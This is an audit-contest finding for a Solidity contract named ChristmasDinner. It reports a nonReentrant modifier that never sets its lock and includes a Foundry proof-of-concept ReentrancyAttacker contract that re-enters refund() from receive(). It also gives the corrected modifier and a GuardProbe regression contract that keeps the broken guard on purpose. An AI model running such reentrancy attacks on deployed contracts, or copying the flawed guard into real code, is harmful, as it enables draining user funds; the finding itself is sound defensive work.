Christmas Dinner

First Flight #31
Beginner Friendly, Foundry, Solidity
100 EXP
Submission Details
Severity: high
Valid

Critical Reentrancy Vulnerability in NonReentrant Modifier

Description: The nonReentrant modifier contains a critical flaw in its reentrancy protection. It checks the locked flag but never sets it to true before the function body executes, so the check cannot stop a nested call; the only write to the flag is the reset to false after the body. The flawed modifier:

modifier nonReentrant() {
    require(!locked, "No re-entrancy");
    _;
    locked = false;
}

Impact:

  • Allows malicious contracts to reenter the contract during execution

  • Potential complete drain of contract funds

  • Bypassing of intended security measures

Proof of Concept:

// In test file
function testReentrancyAttack() public {
    address attacker = makeAddr("attacker");
    // Setup attacker contract that implements receive() to reenter
    ReentrancyAttacker attackerContract = new ReentrancyAttacker(address(christmasDinner));
    // Fund attacker
    vm.deal(address(attackerContract), 1 ether);
    // Trigger attack
    attackerContract.attack{value: 1 ether}();
    // Verify multiple reentrant calls succeeded
    assertGt(attackerContract.callCount(), 1);
}

contract ReentrancyAttacker {
    ChristmasDinner target;
    uint256 public callCount;

    constructor(address _target) {
        target = ChristmasDinner(_target);
    }

    function attack() external payable {
        // Initial deposit
        (bool success,) = address(target).call{value: 1 ether}("");
        require(success, "Initial deposit failed");
    }

    receive() external payable {
        callCount++;
        if (callCount < 3) {
            target.refund();
        }
    }
}

Recommended Mitigation: Implement a proper reentrancy guard that sets the lock before the function body executes:

modifier nonReentrant() {
    require(!locked, "No re-entrancy");
    locked = true;
    _;
    locked = false;
}
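
A guard regression check for the two modifiers above, as an added example that is not part of the submission or the ChristmasDinner code base. GuardProbe, brokenGuard, fixedGuard, depth and the function names are hypothetical; the contract holds no funds and only calls itself to see whether a nested entry is rejected.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration: every name in this contract is hypothetical.
contract GuardProbe {
    bool private locked;
    uint256 public depth; // number of entries that reached a guarded body

    // Guard as quoted in the finding: reads the flag but never sets it.
    modifier brokenGuard() {
        require(!locked, "No re-entrancy");
        _;
        locked = false;
    }

    // Guard from the recommended mitigation: sets the flag before the body.
    modifier fixedGuard() {
        require(!locked, "No re-entrancy");
        locked = true;
        _;
        locked = false;
    }

    // Each function makes one nested external call to itself, standing in
    // for a callee that calls back while the outer frame is still running.
    function enterBroken() external brokenGuard {
        depth++;
        if (depth < 2) this.enterBroken();
    }

    function enterFixed() external fixedGuard {
        depth++;
        if (depth < 2) this.enterFixed();
    }

    // Returns true when the guard rejected the nested call, which reverts
    // the whole outer call; returns false when the nested entry went through.
    function nestedCallRejected(bool useFixed) external returns (bool) {
        depth = 0;
        bytes4 sel = useFixed ? this.enterFixed.selector : this.enterBroken.selector;
        (bool ok, ) = address(this).call(abi.encodeWithSelector(sel));
        return !ok;
    }
}
```

A test suite can assert that nestedCallRejected(true) returns true and nestedCallRejected(false) returns false, which pins the behaviour so that a guard missing the locked = true line fails the build.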
Updates

Lead Judging Commences

0xtimefliez Lead Judge 7 months ago
Submission Judgement Published
Validated
Assigned finding tags:

mutex lock incomplete
